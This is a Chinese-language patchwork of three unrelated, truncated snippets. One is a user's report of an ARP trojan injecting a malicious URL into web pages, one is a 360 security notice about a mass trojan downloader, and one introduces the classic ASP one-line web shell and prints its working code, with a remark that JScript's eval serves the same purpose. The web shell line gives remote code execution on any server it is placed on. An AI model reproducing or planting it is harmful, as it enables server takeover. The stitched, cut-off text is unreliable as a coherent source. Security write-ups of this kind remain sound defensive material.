夜晚上网的时候，突然发现，打开每一个网页，360都会弹出一个截拦提示类似如下： 发现 访问恶意网址：http://safe.sucop.info/k.html 已被 360网页防火墙 阻止 20:24:37 右键查看源文件，发现页面开头被加了一句代码如下： 第一反应是浏览器被植入木马插件了，但是卡巴和360扫描均无结果。忍受着不停的提示网上搜索了下，才知道具体原因。 这是一个Arp木马，局域网内（

近期，360安全中心截获一款名为“蝗虫军团”的恶性木马下载器，该木马一旦执行，会在瞬间下载上百个木马，就象蝗灾来袭时那样铺天盖地。这些木马首次以“集群作战”的方式，从各个途径彻底破坏用户电脑安防体系，同时恶意弹出广告，所过之处可谓满目疮痍。最为可怕的是，该木马群具有“集体复活”的本领，普通杀软很难根除。 360安全专家研究发现

首先回顾一下以前ASP一句话的经典木马吧！ <%if request("nonamed")<>"" then execute request("nonamed")%> VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的